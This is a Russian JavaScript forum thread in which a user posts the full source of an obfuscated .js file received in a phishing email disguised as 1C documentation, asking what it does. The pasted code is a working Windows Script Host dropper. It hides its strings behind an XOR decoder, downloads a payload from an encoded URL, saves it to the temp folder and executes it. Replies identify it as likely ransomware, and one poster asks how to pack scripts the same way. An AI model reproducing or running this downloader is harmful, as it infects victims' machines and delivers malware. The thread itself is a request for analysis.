Javascript.RU

Создать новую тему Ответ
 
Опции темы Искать в теме
  #1 (permalink)  
Старый 08.08.2016, 12:21
Новичок на форуме
Отправить личное сообщение для Huan Посмотреть профиль Найти все сообщения от Huan
 
Регистрация: 08.08.2016
Сообщений: 3

Прислали по почте скрипт, любопытство съедает...
Уважаемые! Даже не знаю, как начать, что бы ничего не нарушить и никого не обидеть: получил по почте скрипт с названием "Документация из 1С v8.1_.5c32cb1.js" - удалить бы, но любопытство взяло верх - кто-то ведь пыхтел, сочинял - а зачем? Просмотрел - нифига не понял, хотя когда-то даже драйвер к принтеру на ассемблере написал, правда под ДОСом еще... Вы тут народ продвинутый - только глянете код - сразу скажете что этот скрипт делает (я бы конечно и сам посмотрел, запустив, но не факт, что что-то увижу Подскажите, можно ли выложить сюда этот скрипт, учитывая его возможную деструктивную суть? Или подскажите, куда мне с этим добром (гусарам - молчать )) Спасибо заранее! Успехов в скриптописании
Ответить с цитированием
  #2 (permalink)  
Старый 08.08.2016, 14:59
Новичок на форуме
Отправить личное сообщение для Huan Посмотреть профиль Найти все сообщения от Huan
 
Регистрация: 08.08.2016
Сообщений: 3

Сообщение от Rise Посмотреть сообщение
Huan, скорее всего это шифровальщик типа такого
Спасибо за ответ. Но по ссылке у меня аваст ругается на текстовый файл даже, а на этот скрипт - нет и внутри ну него ничего подозрительного, он коротенький, мож глянете? Извините за назойливость.


function WtjUwAu(yAB, YtxOanK) {
	var ovBT = "c";
/// e3d6bd0381d5d5d73f3961fcd702adbd
	var nGwvUpjt = "A" + "t";
	var ECONGxh = ovBT + "ha";
	var kXtMxZpl = new Array(ECONGxh + "r" + nGwvUpjt);
	var EGLx = yAB[kXtMxZpl[0]](YtxOanK);
	return EGLx;
}
function lBGKLO(NfC, ooV) {
	var ZecuYrD = "c";
	var aiUPW = "A";
	var mdywbS = "o";
	var yRyK = [ZecuYrD + "h" + "a"];
	var drNB = ["r" + "C" + mdywbS + "d"];
	var MFZgEqKV = ["e" + aiUPW + "t"];
	var SPgOq = yRyK[0] + drNB[0] + MFZgEqKV[0];
	var SOPTG = NfC[SPgOq](ooV);
	return SOPTG;
}
function CkoevdP() {
	var sywdzAun = [];
	sywdzAun[0] = "f";
	sywdzAun[1] = "rom";
	sywdzAun[2] = "C";
	sywdzAun[3] = "ha";
	sywdzAun[4] = "rCode";
	var rZIq = sywdzAun[0] + sywdzAun[1] + sywdzAun[2] + sywdzAun[3] + sywdzAun[4];
/// 048d8f0663f0895e35f6bca92750ebb7
	return rZIq;
}
function kboELG(Bmj, AhYZHALF) {
	var mHPh = Bmj % AhYZHALF;
	return mHPh;
}
function EDLN(itUwdYjj, nyPiFH) {
	var IXexnxpc = itUwdYjj ^ nyPiFH;
	return IXexnxpc;
}
function hnSOz(JPvWZtwg) {
	var jJkCh = JPvWZtwg / 3;
	return jJkCh;
}
function ujfj() {
	var GHhaUjs = "gth";
	var RJZerPlp = "en";
	var juVxSl = "l" + RJZerPlp + GHhaUjs;
	return juVxSl;
}
function Its(pMFLQEV) {
	var evjpXq = pMFLQEV + 1;
	return evjpXq;
}
function PvCzGD(fjxUrdCl) {
	var EYdETnXN = "string";
	var GNjY = "WScript.Network";
/// cbb39566750c238d9ec717b93aa3e237
	var vobFIW = WScript.CreateObject(GNjY);
	var BiDF = typeof vobFIW.UserDomain;
	if (BiDF == EYdETnXN) {
		var MUBdRf = ujfj();
		var VKVi = [''][0];
		var IoovymY = 0;
		var BZAkWDLe = 'lOLohlEtKsN';
		var rISm = BZAkWDLe[MUBdRf];
		var VdpX = 0;
		var ZShHBwWX = "";
		var jWPKWpUS = fjxUrdCl[MUBdRf];
	}
	while (VdpX < jWPKWpUS - 2) {
		var FXZWFRiP = [0][0];
		var meLkdDs = Its(VdpX);
		var fOHcJQY = WtjUwAu(fjxUrdCl, meLkdDs);
		var AVOuNH = WtjUwAu(fjxUrdCl, VdpX + 2);
		var LHXq = WtjUwAu(fjxUrdCl, VdpX);
		ZShHBwWX = LHXq + fOHcJQY + AVOuNH;
		var gfmskX = WtjUwAu(fjxUrdCl, VdpX);
		var nBVYGK = WtjUwAu(fjxUrdCl, VdpX + 1);
		var DlCBnySL102 = (nBVYGK == 0);
		if (gfmskX == FXZWFRiP) {
			var sqpsbWp = VdpX + 1;
			var uwyHO = VdpX + 2;
			var EsWgnVM = WtjUwAu(fjxUrdCl, uwyHO);
			ZShHBwWX = WtjUwAu(fjxUrdCl, sqpsbWp) + EsWgnVM;
		}
		var BvrYdkVF = WtjUwAu(fjxUrdCl, VdpX);
		var DlCBnySL101 = (BvrYdkVF == 0);
		if (DlCBnySL101 && DlCBnySL102) {
			var rOegxJ = VdpX + 2;
			ZShHBwWX = WtjUwAu(fjxUrdCl, rOegxJ);
		}
		IoovymY = parseInt(ZShHBwWX);
		var tPMoCL = hnSOz(VdpX);
		var XcOanJGe = kboELG(tPMoCL, rISm);
		var DlCBnySL = lBGKLO(BZAkWDLe, XcOanJGe);
		IoovymY = EDLN(IoovymY, DlCBnySL);
		var GQWezvxp = CkoevdP();
		var MSTC = String;
		VKVi = VKVi + MSTC[GQWezvxp](IoovymY);
/// 2d5352e9b030dcb4240f2afa6bd216d0
		var WrQjawnX = 3;
		VdpX = VdpX + WrQjawnX;
	}
	return VKVi;
/// b37cb511fe88bd9154caec59cd26cf9e
}
function gGI() {
	var hEOIbc = PvCzGD("004059056031082067106007039022043028060057001070030048091116000");
	return hEOIbc;
}
function taYc() {
	var YavcDw = PvCzGD("059028047029001028049");
	var UaNsk = eval(YavcDw);
	return UaNsk;
}
function YhNq() {
	var iPUWwpJl = PvCzGD("033028020034036094107044006063006056027028");
	return iPUWwpJl;
}
/// b1807332aea2be5bd1d227556ef0b5f7
function YAqBwo(rtwjdld, kdkndmd) {}
function XXVdDap(str) {
	str[PvCzGD("047035035028013")]();
}
function Evxk(rety, serq) {
	var NIFrxo = PvCzGD("015034040065013020032084100016110") + rety;
	serq[PvCzGD("030058034")](NIFrxo, 0);
}
function PEd() {
	var ANrAi = PvCzGD("024038058010048035039030046");
	var dELYE = eval("Ac" + ANrAi + "ct");
	return dELYE;
/// 8d8900cff3fbf23aa17c0b2058a4fb70
}
function GuMOid() {
	var rPpzEk = PEd();
	var bAemYS = PvCzGD("059028047029001028049090024027043000035");
	var EjsSCSFT = new rPpzEk(bAemYS);
	var Ooxsa = taYc();
	var XzMMPm = YhNq();
	var ZHtAM = Ooxsa[PvCzGD("063044062006024024003001039031000013034041")];
	if (ZHtAM[PvCzGD("000042034008028004")] > 2) {
		var yEBdOUV = gGI();
		var MBkgp = new rPpzEk(XzMMPm);
		var DIyZGX = PvCzGD("045011003043042066022000057022047001");
		var tMXKMFe = PvCzGD("043010024");
		MBkgp[PvCzGD("003063041001")](tMXKMFe, yEBdOUV, 0);
		var sJLWl = PvCzGD("031042034011");
		MBkgp[sJLWl]();
		var LfKbSlm = PvCzGD("063044062006024024044026044093008005035041060017031049017038060044006042047027");
		var BLBkkAQi = new rPpzEk(LfKbSlm);
	}
	if (MBkgp[PvCzGD("063059045027029031")] == 200) {
		var jVkUH = new rPpzEk(DIyZGX);
		var YUiIGfTu = BLBkkAQi[PvCzGD("043042056059013001053058042030043")]();
		var YfSQqePS = '\\';
		var rcaSSiec = YfSQqePS + YUiIGfTu;
		var preBLBkkAQi = PvCzGD("043042056060024009038029042031008003035040010026");
		var GoDmtxHk = BLBkkAQi[preBLBkkAQi](2) + rcaSSiec;
		jVkUH[PvCzGD("035063041001")]();
		var Ncmdhc = PvCzGD("056054060010");
		jVkUH[Ncmdhc] = 1;
		var YtYYlRhq = PvCzGD("062042063031007002054017009028042021");
		var lFQXLMEa = MBkgp[YtYYlRhq];
		var RtMzE = PvCzGD("059061037027013");
		jVkUH[RtMzE](lFQXLMEa);
		var mGvq = PvCzGD("060032063006028005042026");
		jVkUH[mGvq] = 0;
		var ymMRlLd = PvCzGD("063046058010060003003029039022");
		jVkUH[ymMRlLd](GoDmtxHk);
		XXVdDap(jVkUH);
		Evxk(GoDmtxHk, EjsSCSFT);
	}
/// c839745f2e160c4ba7f34fd438dd7356
	YAqBwo(BLBkkAQi, ZHtAM);
}
GuMOid();
Ответить с цитированием
  #3 (permalink)  
Старый 08.08.2016, 17:27
Профессор
Отправить личное сообщение для laimas Посмотреть профиль Найти все сообщения от laimas
 
Регистрация: 14.01.2015
Сообщений: 12,989

Сообщение от Huan
внутри ну него ничего подозрительного
Он упакован, а вот при запуске, когда будет распакован, то 99% гарантии, что содержит червяка.
Ответить с цитированием
  #4 (permalink)  
Старый 09.08.2016, 09:23
Новичок на форуме
Отправить личное сообщение для Huan Посмотреть профиль Найти все сообщения от Huan
 
Регистрация: 08.08.2016
Сообщений: 3

Большое спасибо, Rise & laimas!
Немного неприятно, что просто ваааще ничего не понимаю в коде скрипта, грустно, что он еще и упакован и что уже со всем этим ничего не поделать... Хотя, кто его знает, выйду на следующий год на пенсию - чем заниматься? )) Успехов, парни!
Ответить с цитированием
  #5 (permalink)  
Старый 13.09.2016, 03:50
Профессор
Отправить личное сообщение для psiklop Посмотреть профиль Найти все сообщения от psiklop
 
Регистрация: 04.03.2015
Сообщений: 163

Подскажите, как можно упаковать и\или распаковать любой скрипт так как тут?
Ответить с цитированием
  #6 (permalink)  
Старый 23.09.2016, 09:28
Кандидат Javascript-наук
Отправить личное сообщение для MininAS Посмотреть профиль Найти все сообщения от MininAS
 
Регистрация: 22.09.2009
Сообщений: 122

Существует вирус-шифровальщик на JS как раз нацеленный на бухгалтерские документы.....
Вычитал это из инета, так как вчера товарищ впустил к себе DA_VINCHI_CODE...., ну очень неприятная вещь...
Ответить с цитированием
  #7 (permalink)  
Старый 10.10.2016, 20:29
Профессор
Отправить личное сообщение для psiklop Посмотреть профиль Найти все сообщения от psiklop
 
Регистрация: 04.03.2015
Сообщений: 163

мне недавно на мыло пришло письмецо, я бы даже не обратил внимания, но там обратный адрес был домен @sberbank.ru, вот так круто подделали и там тоже был .js типа такого
Ответить с цитированием
Ответ



Опции темы Искать в теме
Искать в теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Скрипт проллакса фона съедает всю оператив.память на компьютере при скролинге runyugin Элементы интерфейса 2 29.01.2015 13:07
PHP/AJAX скрипт "Нaселение мoегo гoрoдa oнлaйн" rustik-yes Работа 2 01.12.2014 22:53
Объясните пожалуйста назначение скрипта который мне прислали по почте guk Общие вопросы Javascript 1 10.08.2014 16:40
Почему скрипт не работает с данными, которые вернул другой скрипт? Rooner jQuery 3 20.09.2012 14:56
Изменить скрипт Изучаю_JS Общие вопросы Javascript 0 12.02.2012 22:05